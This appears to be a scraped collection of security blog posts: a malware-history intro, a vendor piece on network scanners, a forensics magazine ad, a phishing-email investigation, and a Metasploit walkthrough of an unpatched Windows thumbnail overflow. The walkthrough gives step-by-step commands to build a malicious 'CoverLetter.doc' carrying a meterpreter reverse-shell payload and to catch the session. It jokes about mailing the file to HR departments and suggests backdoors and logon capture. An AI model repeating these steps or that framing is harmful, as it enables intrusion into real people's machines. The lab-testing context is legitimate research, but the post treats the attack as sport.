Learning your history is important

It is said that if you don’t know your history you are bound to repeat the past. They same holds true even in the world of Malware. The below Infographics helps with bringing you up to speed with what occurred over the last 28 years in the wonderful world of Malware.

A big thanks to the ESET team for creating and sharing this with the community. I would like to pride myself on know a bit more about Malware than the average user, but even so I learned quite a lot form this Infographics.

So sit back and enjoy the journey that begins with Pakistani Brain in 1986 and ends with Windigo 2014.

3 Best Practices for Optimum Network Security

Following best practices should really be a no-brainer but sometimes administrators managing security have a habit of forgetting one very important practice – that of letting technology help them. Too often, admins are bogged down by numerous manual tasks that could easily be automated – and in so doing, improve overall security and efficiencies. A network security scanner is one tool that should be in every network security best practice manual because it helps them follow best practices with minimal effort. Let’s see why.

1.     Antivirus solutions are up-to-date:

It is good to have a desktop-based antivirus solution; this however will be of little use if for some reason your antivirus definition files are outdated. Making sure each machine has an updated antivirus package can be really time-consuming. Luckily, many good network security scanners can do that for you and automatically inform you when any antivirus definition fields are out-of-date.

2.     Good patch management:

Performing proper patch management is tricky business. Deploying patches as they are made available might seem like the proper thing to do, especially since this will reduce the vulnerability window but patches change software at a core level. This can cause compatibility issues which, in turn, can cause downtime – just what you’re trying to avoid. For this reason patches need to be tested in an environment that mirrors your live environment as much as possible. A network security scanner can generally provide the information needed to be able to build such an environment.

Once patches are tested and deployed on the live environment, it is important to ensure they have been deployed successfully. Failing to do this verification can result in a false sense of security as the environment you’d believe is secured with the latest patches might actually be missing a patch that failed to be deployed.

A good network security scanner reduces the time required to do all the above, allowing the administrator to focus on more urgent tasks.

3.     Change Management:

Some users will try, and manage, to get around company policies. They might do this with the best intentions by installing software to help them do their job more efficiently – even though software installs are not permitted. Or they might break the rules with intent. A good network security scanner can scan your machines and look for any change no matter what it might be. This can be very difficult, if at all possible, to do manually.

A good network security scanner can make the life of an administrator much easier because it allows them to follow many network security best practices with little effort. In security, doing the absolute minimum and not thinking things through properly can be as risky as ignoring security altogether. If time is an issue, implementing a network security scanner could give you a lot more breathing space.

This guest post was provided by Emmanuel Carabott on behalf of GFI Software Ltd. GFI is a leading software developer that provides a single source for network administrators to address their network security, content security and messaging needs. Discover what other benefits a network security scanner can offer your organization.

All product and company names herein may be trademarks of their respective owners.

eForensics Magazine | Free Digital Forensics Magazine

eForensics Magazine is a downloadable magazine focused on digital forensics. It features articles by digital forensics specialists and enthusiasts, experts in Mobile, Computer, Network and Database Forensics. We cover all aspects of electronic forensics, from theory to practice, from methodologies and standards to tools and real-life solutions. Each magazine features a cover focus, and articles from our regular contributors, covering news and up-to-date topics.

It is devoted to the best digital forensics services providers, who will show you the digital forensics world from their perspective. It’s an excellent opportunity to observe trends on the market for the readers, and for companies – to share their invaluable knowledge.

The magazine is available in two subscription options:

FREE SUBSCRIPTION:

Free subscription features 1 issue in a month, each containing about 50 pages of content.

ANNUAL SUBSCRIPTION:

Annual subscription features 48 issues in a year – 4 issues in a month, each containing about 200 pages of content. Different title is published every week:

  • eForensics Computer – 1st of every month
  • eForensics Database – 7th of every month
  • eForensics Mobile – 15th of every month
  • eForensics Network – 22nd of every month

200 PAGES ISSUES ARE ALSO AVAILABLE FOR A SINGLE PURCHASE.

In addition the first issue (eForensics Mobile) to be published July 18th. Inside:

– Mobile Phone Forensics – Huge Challenge of the Future
– Issues in Mobile Device Forensics
– Carving disk partitions using DD

Subscribe for free here: http://eforensicsmag.com/wp-login.php?action=register

New Year, New MS Zero Day

With the new year usually brings hope for new changes however it seems to be the same old story with Microsoft. First advisory of the year and already you have to sit around waiting for MS to release a patch. Todays blog posting is based on the new Vulnerability in Graphics Rendering Engine . The guys over at www.metasploit.com has created a working exploit module for this that I was testing and it seem to be working as stated.

According to the note in the module, This module exploits a stack-based buffer overflow in the handling of thumbnails within .MIC files and various Office documents. When processing a thumbnail bitmap containing a negative ‘biClrUsed’ value, a stack-based buffer overflow occurs. This leads to arbitrary code execution.  In order to trigger the vulnerable code, the folder containing the document must be viewed using the “Thumbnails” view.

The vulnerability is exploited via malicious thumbnail images that may be attached to various documents (e.g. Microsoft Office documents). The most likely exploit vector would use e-mail attachments. However, it is also possible to use network shares.

There is currently no patch available. However, it is possible to modify the access control list on shimgvw.dll to prevent rendering of thumbnails (this would affect all thumbnails, not just malicious once). See the Microsoft advisory for details.

Affected Platforms:

All current versions of Windows, with the exception of Windows 7 and 2008 R2, are vulnerable.

Mitigation:

There is currently no patch available. However, it is possible to modify the access control list on shimgvw.dll to prevent rendering of thumbnails (this would affect all thumbnails, not just malicious once). See the Microsoft advisory for details.

Test Lab Setup:

  • I used Vmware Workstation with two hosts (XP, and BT4)
  • I tested this against a Windows XP SP3 host
  • I used Metasploit v3.6.0-dev [core3.6 api:1.0]  with SVN revision 11471 on BackTrack 4 R2
  • Exploit module used can be found under modules/exploits/windows/fileformat/ms11_xxx_createsizeddibsection.rb

Steps Taken:

  • Launched msfconsole from within the /pentest/exploits/framework3 directory on my BT4 R2 host, once that was up I then issued the svn up command to ensure I had the latest and greatest.
  • Selected my exploit  –>  msf > use exploit/windows/fileformat/ms11_xxx_createsizeddibsection
  • Set filename and Output path –>

msf exploit(ms11_xxx_createsizeddibsection) > set FILENAME CoverLetter.doc

FILENAME => CoverLetter.doc

msf exploit(ms11_xxx_createsizeddibsection) > set OUTPUTPATH opt/metasploit3/msf3/data/exploits

OUTPUTPATH => /opt/metasploit3/msf3/data/exploits

Choosing your Payload: I decided to go with the meterpreter

msf exploit(ms11_xxx_createsizeddibsection) > set PAYLOAD windows/meterpreter/reverse_tcp

PAYLOAD => windows/meterpreter/reverse_tcp

Setting up your local host (host you want victim to reverse connect too):

msf exploit(ms11_xxx_createsizeddibsection) > set LHOST 192.168.19.129

LHOST => 192.168.19.129

msf exploit(ms11_xxx_createsizeddibsection) > set LPORT 4545

LPORT => 4545

Next issue the command  exploit to create your malicious file:

msf exploit(ms11_xxx_createsizeddibsection) > exploit

[*] Creating ‘CoverLetter.doc’ file …

[*] Generated output file /opt/metasploit3/msf3/data/exploits/CoverLetter.doc

Next we need to setup our reverse handler to listen on port 4545 for any incoming connections once our victim views/open our specially crafter file.  We can take this resume file and blast it out to HR departments across the net and just sit back and wait for them to  connect back home :).

msf exploit(ms11_xxx_createsizeddibsection) > use exploit/multi/handler

msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp

PAYLOAD => windows/meterpreter/reverse_tcp

msf exploit(handler) > set LHOST 192.168.19.129

LHOST => 192.168.19.129

msf exploit(handler) > set LPORT 4545

LPORT => 4545

msf exploit(handler) > exploit

Now once our victim views the file in a thumbnail view, or opens it  you should see something like this:

[*] Started reverse handler on 192.168.19.129:4545

[*] Starting the payload handler…

[*] Sending stage (749056 bytes) to 192.168.19.147

[*] Meterpreter session 1 opened (192.168.19.129:4545 -> 192.168.19.147:1591) at Tue Jan 04 20:39:40 -0500 2011

From here you can jump into a shell on the system by issuing the “shell” command, or setup a Persistence Meterpreter backdoor as shown by Carlos, or start Capturing Windows Logons with Smartlocker basically sky’s the limit……Have fun hacking something.

Refernce links:

https://www.microsoft.com/technet/security/advisory/2490606.mspx

http://blog.metasploit.com/2010/12/capturing-windows-logons-with.html

http://isc.sans.edu/diary.html?storyid=10201

Yet another Phising email

Today one of our faculty member forward an email to our help-desk and indicated we take a look at it because it might be a phising/spam email, you can only image how happy that made me. Now in the past we have had cases where people would reply to these type of emails and receive more  spam in the process, or worst, “give their credentials away” but that was not the case today.

Below is an image of the email that was received today.

Fig-1 Phising Email

Now the first thing that I found funny about this email is the fact that the phone number for tech support was an IP Address, maybe the overlooked that one or it was done out of humor either way it set off some flags for me and it should for anyone that receives an email like this.

Once I identified the email as a phising attempt to harvest login credentials I got curious and decided to load Firefox within sandboxie and clicked on the link in the email to see what it would do.

Fig-2 Firefox Untrusted Error

Now after clicking on the link in the email I was redirected to http://www.eformit.com , which triggered a FireFox error because Firefox was unable to confirm that my connection to the site was secure. Since I was in search of seeing where the link would take me I went ahead and added the certificate and continued. In general if you ever get this error you should never add the certificate but instead close out your browser and do some research on the site in question.

Next I went ahead and examine the server SSL certificate and realized that it expired a few days ago, that’s another reason that would tell me this site was bad business, but since I already knew that I proceeded all the same.

Fig-3 Expired Cert

Now on to the next portion of this journey, after clicking on the link I was taken to a website with a very contradictory notice, “we will never send emails to users requesting email account information” however that’s exactly what the page is asking you to type in.

Fig-4 Credentials harvesting form

Now lastly after filling in my email and password :), I was redirected to a parking page filled with cheap advertising another sign of trouble.

Fig-5 Redirected page

Additional information courtesy of  http://anubis.iseclab.org a very useful source for analyzing uncertain files and URL’s.

Fig-6 Additional network analysis information

In the end its always important to train your users to identify what a good or bad email look like and what your network policies are for these type of emails. Also when in doubt load-up your sandbox and have some fun.

References

http://scanner.novirusthanks.org/

http://anubis.iseclab.org

http://www.sandboxie.com/